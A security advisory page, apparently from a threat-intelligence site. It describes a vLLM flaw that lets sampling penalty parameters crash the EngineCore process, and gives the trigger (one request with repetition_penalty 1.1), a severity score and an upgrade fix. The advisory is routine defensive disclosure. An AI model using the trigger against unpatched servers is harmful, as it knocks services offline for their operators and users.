CVE-2026-44223: CWE-131: Incorrect Calculation of Buffer Size in vllm-project vllm
vLLM versions from 0. 18. 0 up to but not including 0. 20. 0 contain a vulnerability in the extract_hidden_states speculative decoding proposer. When a request in a batch uses sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty, the engine returns a tensor with an incorrect shape after the first decode step. This causes a RuntimeError that crashes the EngineCore process. The issue is resolved in version 0. 20. 0.
AI Analysis
Technical Summary
The vulnerability (CVE-2026-44223) in vLLM, an inference and serving engine for large language models, arises from an incorrect calculation of buffer size (CWE-131) in the extract_hidden_states speculative decoding proposer. Specifically, when sampling penalty parameters are used in any request within a batch, the engine returns a tensor with an incorrect shape after the first decode step, triggering a RuntimeError that crashes the EngineCore process. This crash can be triggered by a single request with a penalty parameter such as repetition_penalty set to 1.1. The flaw affects versions >= 0.18.0 and < 0.20.0 and is fixed in version 0.20.0.
Potential Impact
The vulnerability causes a denial of service by crashing the EngineCore process when processing requests that include sampling penalty parameters. There is no indication of confidentiality or integrity impact. The CVSS v3.1 score is 6.5 (medium severity), reflecting network attack vector, low attack complexity, low privileges required, no user interaction, and impact limited to availability (engine crash). There are no known exploits in the wild.
Mitigation Recommendations
Upgrade to vLLM version 0.20.0 or later, where this vulnerability is fixed. No other official remediation or temporary workaround is indicated. Patch status is not explicitly stated beyond the fix in version 0.20.0, so users should verify the upgrade with the vendor or official release notes.
CVE-2026-44223: CWE-131: Incorrect Calculation of Buffer Size in vllm-project vllm
Description
vLLM versions from 0. 18. 0 up to but not including 0. 20. 0 contain a vulnerability in the extract_hidden_states speculative decoding proposer. When a request in a batch uses sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty, the engine returns a tensor with an incorrect shape after the first decode step. This causes a RuntimeError that crashes the EngineCore process. The issue is resolved in version 0. 20. 0.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability (CVE-2026-44223) in vLLM, an inference and serving engine for large language models, arises from an incorrect calculation of buffer size (CWE-131) in the extract_hidden_states speculative decoding proposer. Specifically, when sampling penalty parameters are used in any request within a batch, the engine returns a tensor with an incorrect shape after the first decode step, triggering a RuntimeError that crashes the EngineCore process. This crash can be triggered by a single request with a penalty parameter such as repetition_penalty set to 1.1. The flaw affects versions >= 0.18.0 and < 0.20.0 and is fixed in version 0.20.0.
Potential Impact
The vulnerability causes a denial of service by crashing the EngineCore process when processing requests that include sampling penalty parameters. There is no indication of confidentiality or integrity impact. The CVSS v3.1 score is 6.5 (medium severity), reflecting network attack vector, low attack complexity, low privileges required, no user interaction, and impact limited to availability (engine crash). There are no known exploits in the wild.
Mitigation Recommendations
Upgrade to vLLM version 0.20.0 or later, where this vulnerability is fixed. No other official remediation or temporary workaround is indicated. Patch status is not explicitly stated beyond the fix in version 0.20.0, so users should verify the upgrade with the vendor or official release notes.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- GitHub_M
- Date Reserved
- 2026-05-05T15:42:40.518Z
- Cvss Version
- 3.1
- State
- PUBLISHED
- Remediation Level
- null
Threat ID: 6a038bd7cbff5d8610164968
Added to database: 5/12/2026, 8:21:43 PM
Last enriched: 5/12/2026, 8:39:04 PM
Last updated: 5/12/2026, 10:47:15 PM
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.